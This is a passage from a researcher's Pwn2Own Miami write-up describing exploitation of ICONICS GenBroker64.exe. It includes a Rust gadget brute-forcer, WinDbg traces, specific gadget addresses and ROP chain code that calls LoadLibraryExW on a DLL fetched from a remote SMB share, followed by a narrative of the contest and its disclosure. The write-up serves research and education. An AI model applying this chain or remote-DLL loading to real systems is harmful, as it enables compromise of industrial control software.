All those constraints felt underwhelming at first, so I decided to address them one by one. What do we need from our ROP chain? The ROP chain needs to demonstrate arbitrary code execution, which is commonly done by popping a shell. Because of ASLR, we don't know where CreateProcess or similar are in memory. We are stuck to reusing functions imported by GenBroker64.exe. This is possible because we know where its Import Address Table is, and we know API addresses are populated in this table by the PE loader when the process is created. Unfortunately, GenBroker64.exe doesn't import anything super exciting:

The only obvious import that stands out was LoadLibraryExW. It allows loading a DLL hosted on a remote share. This is cool, but it also means we need to burn space in the reclaimed heap chunk just to store a UTF-16 string that looks like the following: \\192.168.1.1\x\a.dll\x00. This is already ~44 bytes 😓.

How the hell do we boost the constrained call primitive into an arbitrary call primitive 🤔? Based on the constraints, looking for that magic gadget was painful and a bit of a walk in the desert. I started doing it manually and focusing on virtual tables because in essence.. we need a very specific one. On top of being well formed, the function pointer at offset 0x10 needs to be pointing to a piece of code that is useful for us. After hours and hours of prototyping, searching, and trying ideas, I lost hope. It was so weird because it felt like I was so close but so far away at the same time 😢.

I switched gears and decided to write a brute-force tool. The idea was to capture a crash dump when I hijack control flow and replace the virtual address table pointer with EVERY addressable part of GenBroker64.exe. The emulator executes forward and catches crashes. When one occurs, I can check postconditions such as 'Does RIP have a value that looks like a controlled value'? I initially wrote this as a quick & dirty script but recently rewrote it in Rust as a learning exercise 🦀. I'll try to clean it up and release it if people are interested. The precondition function is used to insert the candidate address right where the vtable is expected to be at to simulate our exploit. The pre function runs before the emulator starts executing:

impl Finder for Pwn2OwnMiami2022_1 {
    fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
        // ```
        // (1574.be0): Access violation - code c0000005 (first/second chance not available)
        // For analysis of this file, run !analyze -v
        // oleaut32!VariantClearWorker+0xff:
        // 00007ffb`3a3dc7fb 488b4010        mov     rax,qword ptr [rax+10h] ds:deadbeef`baadc0ee=????????????????
        //
        // 0:011> u . l3
        // oleaut32!VariantClearWorker+0xff:
        // 00007ffb`3a3dc7fb 488b4010        mov     rax,qword ptr [rax+10h]
        // 00007ffb`3a3dc7ff ff15c3ce0000    call    qword ptr [oleaut32!_guard_dispatch_icall_fptr (00007ffb`3a3e96c8)]
        //
        // 0:011> u poi(00007ffb`3a3e96c8)
        // oleaut32!guard_dispatch_icall_nop:
        // 00007ffb`3a36e280 ffe0            jmp     rax
        // ```
        let rcx = emu.rcx();

        // Rewind to the instruction right before the crash:
        // ```
        // 0:011> ub .
        // oleaut32!VariantClearWorker+0xe6:
        // ...
        //00007ffb'3a3dc7f8 488b01          mov     rax,qword ptr [rcx]
        // ```
        emu.set_rip(0x00007ffb_3a3dc7f8);

        // Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. The first qword
        // is used to hijack control flow, so this is where we write the candidate
        // address.
        for qword in 0..18 {
            let idx = qword * std::mem::size_of::<u64>();
            let idx = idx as u64;
            let value = if qword == 0 {
                candidate
            } else {
                MARKER_PAGE_ADDR.u64()
            };

            emu.virt_write(Gva::new(rcx + idx), &value)?;
        }

        Ok(())
    }

    fn post(&mut self, emu: &Emu) -> Result<bool> {
      // ...
    }
}

The post function runs after the emulator halted (because of a crash or a timeout). The below tries to identify a tainted RIP:

impl Finder for Pwn2OwnMiami2022_1 {
    fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
      // ...
    }

    fn post(&mut self, emu: &Emu) -> Result<bool> {
        // What we want here, is to find a sequence of instructions that leads to @rip
        // being controlled. To do that, in the |Pre| callback, we populate the buffer
        // we control with the `MARKER_PAGE_ADDR`, which is a magic address
        // that'll trigger a fault if it's accessed/written to / executed. Basically,
        // we want to force a crash as this might mean that we successfully found a
        // gadget that'll allow us to turn the constrained arbitrary call from above,
        // to an uncontrolled where we don't need to worry about dereferences (cf |mov
        // rax, qword ptr [rax+10h]|).
        //
        // Here is the gadget I ended up using:
        // ```
        // 0:011> u poi(1400aed18)
        // 00007ffb2137ffe0   sub     rsp,38h
        // 00007ffb2137ffe4   test    rcx,rcx
        // 00007ffb2137ffe7   je      00007ffb`21380015
        // 00007ffb2137ffe9   cmp     qword ptr [rcx+10h],0
        // 00007ffb2137ffee   jne     00007ffb`2137fff4
        // ...
        // 00007ffb2137fff4   and     qword ptr [rsp+40h],0
        // 00007ffb2137fffa   mov     rax,qword ptr [rcx+10h]
        // 00007ffb2137fffe   call    qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]
        // ```
        let mask = 0xffffffff_ffff0000u64;
        let marker = MARKER_PAGE_ADDR.u64();
        let rip_has_marker = (emu.rip() & mask) == (marker & mask);

        Ok(rip_has_marker)
    }
}

I went for lunch to take a break and let the bruteforce run while I was out. I came back and started to see exciting results 😮:

Although it took multiple iterations to tighten the postconditions to eliminate false positives, I eventually found glorious 0x1400aed08. Let's run through what glorious 0x1400aed08 does. Small reminder, this is the code we hijack control-flow from:

00007ffb'0df751cb mov     rax,qword ptr [rcx]
00007ffb'0df751ce mov     rax,qword ptr [rax+10h]
00007ffb`0df751d2  call    qword ptr [00007ffb`0df82660] ; points to jump @rax

Okay, the first instruction reads the first QWORD in the heap chunk which we'll set to 0x1400aed08. The second instruction reads the QWORD at 0x1400aed08+0x10, which points to a function in mfc140u!CRuntimeClass::CreateObject:

0:011> dqs 0x1400aed08+10
00000001`400aed18  00007ffb`2137ffe0 mfc140u!CRuntimeClass::CreateObject [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\objcore.cpp @ 127]

Execution is transferred to 0x7ffb2137ffe0 / mfc140u!CRuntimeClass::CreateObject, which does the following:

0:011> u 00007ffb2137ffe0
00007ffb2137ffe0   sub     rsp,38h
00007ffb2137ffe4   test    rcx,rcx
00007ffb2137ffe7   je 00007ffb'21380015          ; @rcx is never going to be zero, so we won't take this jump
00007ffb2137ffe9   cmp     qword ptr [rcx+10h],0 ; @rcx+0x10 is populated with data from our future ROP chain
00007ffb2137ffee   jne 00007ffb'2137fff4         ; so it will never be zero meaning we'll take this jump always
...
00007ffb2137fff4   and     qword ptr [rsp+40h],0
00007ffb2137fffa   mov     rax,qword ptr [rcx+10h]
00007ffb2137fffe   call    qword ptr [mfc140u!__guard_dispatch_icall_fptr (00007ffb`21415b60)]

0:011> u poi(00007ffb`21415b60)
mfc140u!_guard_dispatch_icall_nop [D:\a01\_work\6\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asm @ 53]:
00007ffb`21407190 ffe0            jmp     rax

Okay, so this is .. amazing ✊🏽. It reads at offset 0x10 off our chunk, and assuming it isn't zero it will redirect execution there. If we set-up the reclaimed chunk to have the first QWORD be 0x1400aed08, and the one at offset 0x10 to 0xdeadbeefbaadc0de, then execution is redirected to 0xdeadbeefbaadc0de. This precisely boosts the constrained call primitive into an arbitrary call primitive. This is solid progress, and it filled me with hope.

With an arbitrary call primitive in hands, we need to find a way to kick-start a ROP chain. Usually, the easiest way to do that is to pivot the stack to an area you control. Chaining the gadgets is as easy as returning to the next one in line. Unfortunately, finding this pivot was also pretty annoying. GenBroker64.exe is fairly small in size and doesn't offer many super valuable gadgets. Another wall.

I decided to try to find the pivot gadget with my tool. Like in the previous example, I injected the candidate address at the right place, looked for a stack pivoted inside the heap chunk we have control over, and a tainted RIP:

impl Finder for Pwn2OwnMiami2022_2 {
    fn pre(&mut self, emu: &mut Emu, candidate: u64) -> Result<()> {
        // Here, we continue where we left off after the gadget found in |miami1|,
        // where we went from constrained arbitrary call, to unconstrained arbitrary
        // call. At this point, we want to pivot the stack to our heap chunk.
        //
        // ```
        // (1de8.1f6c): Access violation - code c0000005 (first/second chance not available)
        // For analysis of this file, run !analyze -v
        // mfc140u!_guard_dispatch_icall_nop:
        // 00007ffd`57427190 ffe0            jmp     rax {deadbeef`baadc0de}
        //
        // 0:011> dqs @rcx
        // 00000000`1970bf00  00000001`400aed08 GenBroker64+0xaed08
        // 00000000`1970bf08  bbbbbbbb`bbbbbbbb
        // 00000000`1970bf10  deadbeef`baadc0de <-- this is where @rax comes from
        // 00000000`1970bf18  61616161`61616161
        // ```
        self.rcx_before = emu.rcx();

        // Fix up @rax with the candidate's address.
        emu.set_rax(candidate);

        // Fix up the buffer, where the address of the candidate would be if we were
        // executing it after |miami1|.
        let size_of_u64 = std::mem::size_of::<u64>() as u64;
        let second_qword = size_of_u64 * 2;
        emu.virt_write(Gva::from(self.rcx_before + second_qword), &candidate)?;

        // Overwrite the buffer we control with the `MARKER_PAGE_ADDR`. Skip the first 3
        // qwords, because the first and third ones are already used to hijack flow
        // and the second we skip it as it makes things easier.
        for qword_idx in 3..18 {
            let byte_idx = qword_idx * size_of_u64;
            emu.virt_write(
                Gva::from(self.rcx_before + byte_idx),
                &MARKER_PAGE_ADDR.u64(),
            )?;
        }

        Ok(())
    }

    fn post(&mut self, emu: &Emu) -> Result<bool> {
        //Let's check if we pivoted into our buffer AND that we also are able to
        // start a ROP chain.
        let wanted_landing_start = self.rcx_before + 0x18;
        let wanted_landing_end = self.rcx_before + 0x90;
        let pivoted = has_stack_pivoted_in_range(emu, wanted_landing_start..=wanted_landing_end);

        let mask = 0xffffffff_ffff0000;
        let rip = emu.rip();
        let rip_has_marker = (rip & mask) == (MARKER_PAGE_ADDR.u64() & mask);
        let is_interesting = pivoted && rip_has_marker;

        Ok(is_interesting)
    }
}

After running it for a while, 0x14005bd25 appeared:

Let's run through what happens when execution is redirected to 0x14005bd25:

0:011> u 0x14005bd25 l3
GenBroker64+0x5bd25:
00000001`4005bd25 8be1            mov     esp,ecx
00000001`4005bd27 803d5a2a0a0000  cmp     byte ptr [GenBroker64+0xfe788 (00000001`400fe788)],0
00000001`4005bd2e 0f8488010000    je      GenBroker64+0x5bebc (00000001`4005bebc)

0:011> db 00000001`400fe788 l1
00000001`400fe788  00                                               .

0:011> u 00000001`4005bebc l0n11
GenBroker64+0x5bebc:
00000001`4005bebc 4c8d5c2460      lea     r11,[rsp+60h]
00000001'4005bec1 498b5b30        mov     rbx,qword ptr [r11+30h]
00000001'4005bec5 498b6b38        mov     rbp,qword ptr [r11+38h]
00000001'4005bec9 498b7340        mov     rsi,qword ptr [r11+40h]
00000001'4005becd 498be3          mov     rsp,r11
00000001`4005bed0 415f            pop     r15
00000001`4005bed2 415e            pop     r14
00000001`4005bed4 415d            pop     r13
00000001`4005bed6 415c            pop     r12
00000001'4005bed8 5f              pop     rdi
00000001`4005bed9 c3              ret

This one is interesting. The first instruction effectively pivots the stack to the heap chunk under our control. What is weird about it is that it uses the 32-bit registers esp & ecx and not rsp & rcx. If either the stack or our heap buffer addresses were to be allocated inside a region above 0xffff'ffff, things would go wrong (because of truncation).

0:011> r @rsp
rsp=000000001961acd8

0:011> r @rcx
rcx=000000001970bf00

There's no way both of those addresses are always allocated under 0xffff'ffff I thought. I must have gotten lucky when I captured the crash-dump. But after running it multiple times it seemed like both the heap and the stack addresses fit into a 32-bit register. This was unexpected, and I don't know why the kernel always seems to lay out those regions in the lower part of the virtual address space. Regardless, I was happy about it 😅

After pivoting the stack, it reads three values into @rbx, @rbp & @rsi at different offsets from @r11. @r11 is pointing to @rsp+0x60 which is at offset 0x60 from the heap chunk start. This is fine because we have control over 0xc0 bytes which makes the offsets 0x90 / 0x98 / 0xa0 inbound. After that, the stack is pivoted again a little further via the mov rsp, r11 instruction, which moves it 0x60 bytes forward. From there, five pointers are popped off the stack, giving us control over @r15 / @r14 / @r13 / @r12 / @rdi.

What's next now 🤔? We made a lot of progress but what we've been doing until now is just setting things up to do useful things. The puzzle pieces are yet to be arranged to call LoadLibraryExW(L"\\\\192.168.0.1\\x\\a.dll\x00", 0, 0). The target is a 64-bit process, so we need to load @rcx with a pointer to the string. Both @rdx & @r8 need to be set to zero. To call LoadLibraryExW, we need to dereference the IAT chunk at 0x1400ae418, and redirect execution there:

0:011> dqs 0x1400ae418 l1
00000001`400ae418  00007ffd`7028e4f0 kernel32!LoadLibraryWStub

We will put the string in the heap chunk so we just need to find a way to load its address in @rcx. @rcx points to the start of our heap chunk, so we need to add an offset to it. I did this with an add ecx, dword [rbp-0x75] gadget. I load @rbp with an address that points to the value I need to align @ecx with. Depending on where our heap chunk is allocated, the add ecx could trigger similar problems than the stack pivot but testing showed that the address always landed in the lower 4GB of the address space making it safe.

# Set @rbp to an address that points to the value 0x30. This is used
# to adjust the @rcx pointer to the remote dll path from above.
#   0x1400022dc: pop rbp ; ret  ;  (717 found)
pop_rbp_gadget_addr = 0x1400022DC
#   > rp-win-x64.exe --file GenBroker64.exe --search-hexa=\x30\x00\x00\x00
#   0x1400a2223: 0\x00\x00\x00
_0x30_ptr_addr = 0x1400A2223
p += p64(pop_rbp_gadget_addr)
p += p64(_0x30_ptr_addr + 0x75)
left -= 8 * 2

# Adjust the @rcx pointer to point to the remote dll path using the
# 0x30 pointer loaded in @rbp from above.
#   0x14000e898: add ecx, dword [rbp-0x75] ; ret  ;  (1 found)
add_ecx_gadget_addr = 0x14000E898
p += p64(add_ecx_gadget_addr)
left -= 8

It is convenient to have the stack pivoted into a heap chunk under our control but it is dangerous to call LoadLibraryExW in that state. It will corrupt neighboring chunks, risk accessing unmapped memory, etc. It's bad. Very bad. We don't necessarily need to pivot back the stack where it was before, but we need to pivot it into a reasonably large region of memory in which content stays the same, or at least not often. After several tests, pivoting to GenClient64's data section seemed to work well:

0:011> !dh -a genclient64
SECTION HEADER #3
   .data name
    6C80 virtual size
  12B000 virtual address
C0000040 flags
         Read Write

I reused the pop rbp gadget, used a leave; call qword [@r14+0x08] gadget to both pivot the stack, and redirect execution to LoadLibraryExW. It isn't reflected well in this article but finding this gadget was also annoying. The challenge was to be able to pivot the stack and call LoadLibraryExW at the same time. I have no control over GenClient64's data section which means I lose control of the execution flow if I only pivot there. On top of that, I was tight on available space.

Phew, we did it 😮. Putting this ROP chain together was a struggle and was nerve-wracking. But you know, making constant small incremental progress led us to the summit. There were other challenges I ran into that I didn't describe in this article though. One of them was that I first tried to deliver the payload via a WebDav share instead of SMB. I can't remember the reason, but what would happen is that the first time the link was fed to LoadLibraryExW, it would fail, but the second time the payload would pop. I spent time reverse-engineering mrxdav.sys to understand what was different the first from the second time the load request was sent, but I can't remember why. Yeah, I know, super helpful 😬. Also another essential property of this vulnerability is that losing the race doesn't lead to a crash. This means the exploit can try as many times as we want.

After weeks of grinding against this target after work, I finally had something that could be demonstrated during the contest. What a crazy ride 🎢.

🎊 Entering the contest

At this point in the journey, it is probably the end of November / or mid-December 2022. The contest is happening at the end of January, so timeline-wise, it is looking great. There's time to test the exploit, tweak it to maximize the chances of landing successfully, and develop a payload for style points at the contest and have some fun. I am feeling good and was preparing for a vacation trip to France to see my family and take a break.

I'm not sure exactly when this happened, but COVID-19 pushed the competition back to the 19th / 21st of April 2023. This was a bummer as I worked hard to be on time 😩. I was disappointed, but it wasn't the worst thing to happen. I could relax a bit more and hope this extra time wouldn't allow the vendor to find and fix the vulnerability I planned to exploit. This part was a bit nerve-wracking as I didn't know any of the vendors; so I wasn't sure if this was something likely to happen or not.

Testing the exploit wasn't the most fun activity, but I was determined to do all the due diligence from my side as I wanted to maximize my chances to win. I knew the target software would run in a VMWare virtual machine, so I downloaded it, and set one up. It felt silly as I had done my tests in a Hyper-V VM, and I didn't expect that a different hypervisor would change anything. Whatever. I get amazed every day at how complex and tricky to predict computers are, so I knew it might be useful.

The VM was ready, I threw the exploit at it, excited as always, and... nothing. That was unexpected, but it wasn't 100% reliable either, so I ran it more times. But nothing. Wow, what the heck 😬? It felt pretty uncomfortable, and my brain started to run far with impostor syndrome. I asked myself "Did you actually find a real vulnerability?" or "Had you set up the target with a non-default configuration?". Looking back on it, it is pretty funny, but oh boy, I wasn't laughing at the time.

I installed my debugging tools inside the target and threw the exploit on the operating table. I verified that I was triggering the memory corruption, and that my ROP chain was actually getting executed. What a relief. Maybe I do understand computers a little bit, I thought 😳.

Stepping through the ROP chain, it was clear that LoadLibraryExW was getting executed, and that it was reaching out to my SMB server. It didn't seem to ask to be served with the DLL I wanted it to load though. Googling the error code around, I realized something that I didn't know, and could be a deal breaker. Windows 10, by default, prevents the default SMB client library from connecting anonymously to SMB share 😮 Basically, the vector that I was using to deliver the final payload was blocked on the latest version of Windows. Wow, I didn't see this coming, and I felt pretty grateful to set up a new environment to run into this case.

What was stressing me out, though, was that I needed to find another way to deliver the payload. I didn't see other quick ways to do that because of ASLR, and the imports of GenBroker64.exe. I had potential ideas, but they would have required me to be able to store a much larger ROP chain. But I didn't have that space. What was bizarre, though, was the fact that my other VM was also Windows 10, and it was working fine. It could have been possible that it wasn't quite the latest Windows 10 or that somehow I had turned it back on while installing some tool 🤔.

I eventually landed on this page, I believe: Guest access in SMB2 and SMB3 disabled by default in Windows. According to it, Windows 10 Enterprise edition turns it off by default, but Windows 10 Pro edition doesn't. So supposedly everything would be back working if I installed a Windows 10 Pro edition..? I reimaged my VM with a Professional version, and this time, the exploit worked as expected; phew 😅 I dodged a bullet on this one. I really didn't want to throw away all the work I had done with the ROP chain, and I wasn't motivated to find, and assemble new puzzle pieces.

I was finally.... ready. I was extremely nervous but also super excited. I worked hard on that project; it was time to collect some dividends and have fun.

I didn't want to burn too many vacation days, so I caught a red-eye flight from Seattle to Miami International Airport on the first day of the competition.

I landed at 7AM ish, grabbed a taxi from the airport and headed to my hotel in Miami Beach, close to The Fillmore Miami Beach (the venue).

I watched the draw online and was scheduled to go on the first day of the contest, on April 14th, at 2 p.m. local time. I worked the morning and took my afternoon off to attend the competition.

I showed up at the conference venue but didn't see any Pwn2Own posters or anything. Security guards were checking the attendees' badges, so I couldn't get in. I looked around the building for another entrance and checked my phone to see if I had missed something, but nothing. I returned to the main entrance to ask the security guards if they knew where Pwn2Own was happening. This was hilarious because they had no clue what this was. I asked "Do you know where the Pwn2Own competition is happening?", the guy answered "Hmm no I never heard about this. Let me ask my colleague" and started talking to his buddy through the earpiece. "Yo mitch, do you know anything about a ... own to pown, or an own to own competition..?". Boy, I was standing there, laughing hard inside 😂. After a few exchanges, they decided to grab somebody from the organization, and that person let me in and made me a badge: Pown 2Own. Epic 👌🏽

I entered the competition area, a medium-sized room with a few tables, the stage, and people hanging out. It was reasonably dark, and the light gave it a nice hacker ambiance. I hung out in the room, observing what people were up to. Journalists coming in and out, competitors discussing the schedule, etc.

The clock was ticking, and my turn was coming up pretty fast. I was worried that I wouldn't have time to set up and verify the configuration of the official target. I tried to make my presence known to the organizers, but I don't think they noticed. About 15 minutes before my turn, one of the organizers found me, and we went on the stage to set things up. I pulled out my laptop, plugged an ethernet cable that connected me to the target laptop, and configured a static IP. I chose the same IP I used during my testing to ensure I didn't have a larger IP address, which would require a larger string and potentially run out of space on my ROP chain 🫢. I tried pinging the target IP, but it wasn't answering. I began to check if my firewall was on or if I had mistyped something but nothing worked. At this point, we decided to switch the ethernet cable as it was probably the problem. The clock was ticking, and we were about 5 minutes from show time but nothing was working yet.

I was getting nervous as I wanted to verify a few things on the target laptop to ensure it was properly configured. I ran through my checklist while somebody was looking for a new ethernet cable. I checked the remote software version, the target IP, that GenBroker64.exe was an x64 binary. One of the organizers handed me a cable, so I hooked it up. The Pwn2Own host started to go live and I could hear him introducing my entry. After a few seconds, he comes over and asks if we're ready.. to which I answer nervously yes, when in fact, I wasn't ready 🤣. I had two minutes left to verify connectivity with the target and make sure the target could browse an SMB share I opened to ensure my payload would deliver just fine. The target could browse my share, and I was finally able to ping the target right on time to go live.

I felt stressed out and had a hard time typing the command line to invoke my exploit. I was worried I would mistype the IP address or something silly like that. I pressed enter to launch it... and immediately saw the calculator popping as well as the background wallpaper changed. I was stunned 😱. I just could not believe that it landed. To this day, I am still shocked that it worked out. I couldn't believe it; I am not even sure I cracked a smile 😅. People clapped, I closed my laptop and stood up, feeling the adrenaline rush through my legs. Powerful.

I followed one of the event organizers to the disclosure room, where ZDI verified that the vulnerability wasn't known to them. They looked on their laptop for a minute or two and said that they didn't know about it. Awesome. The second stage happens with the vendor. An employee of ICONICS entered the room, and I described to them the vulnerability and the exploit at a high level. They also said they didn't know about this bug, so I had officially won 🔥🙏.

I handshaked the organizers and returned to my hotel with a big ass smile on my face. I actually couldn't stop smiling like a dummy. I dropped my laptop there and decided to take the day after off to reward myself. I returned to the venue and hung out in the room to attend the other entries for the day. This is where I eventually ran into Steven Seeley and Chris Anastasio. Those guys were planning to demonstrate 5 different exploits which seemed insane to me 😳. It put things into perspective and made me feel like I had a lot to learn which was exciting. On top of killing it at the competition, they were also extremely friendly and let me know that they were setting up a dinner with other participants. I was definitely game to join them and meet up with folks.

We met at a restaurant in Miami Beach and I met the Flashback team (Pedro & Radek), Sharon & Uri from the Claroty Research team, and Daan & Thijs from Computest Sector7. Honestly, it felt amazing to meet fellow researchers and learn from them. It was super interesting to hear people's backgrounds, how they approached the competition, and how they looked for bugs.

I spent the next two days hanging out, cheering for the competitors in the Pwn2Own room, grabbing celebratory drinks, and having a good time. Oh and of course, I grabbed oversized Pwn2Own Miami swag shirts 😅 Steven & Chris owned so many targets with a first-blood that they won many laptops. Out of kindness, they offered me one as a present, which I was super grateful for and has been a great memento memory for me; so a big thank you to them.

I packed my bag, grabbed a taxi, headed to the airport, and flew back home with lifelong memories 🙏

✅ Wrapping up

In this post I tried to walk you through the ups and downs of vulnerability research 🎢 I want to thank the ZDI folks for both organizing such a fun competition and rooting for participants 🙏. Also, special thanks to all the contestants for being inspiring, and their kindness 🙏.

I think there are some good lessons that I learned that might be useful for some of you out there:

Don't under-estimate what tooling can do when aimed at the right things. I initially didn't want to use fuzzing as I was interested in code-review only. In the end, my quick fuzzing campaign highlighted something that I missed and that area ended up being juicy.
Focus on understanding the target. In the end, it facilitates both bug finding and exploitation.
Try to focus on solving problems one by one. Trying to visualize all the steps you have to go through to make something work can feel overwhelming. Ironically, for me it usually leads to analysis paralysis which completely halts progress.
Somehow attack surface enumeration isn't super fun to me. I always regret not spending enough time doing it.
Testing isn't fun but it is worth being thorough when the stakes are high. It would have been heartbreaking for my entry to fail for an issue that I could have caught by doing proper testing.

If you want to take a look, the code of my exploit is available on Github: Paracosme. If you are interested in reading other write-ups from Pwn2Own Miami 2022, here is a list:

Special thank you to my boiz yrp604 and __x86 for proofreading this article 🙏.

Last but not least, come hangout on Diary of reverse-engineering's Discord server with us 👌🏽!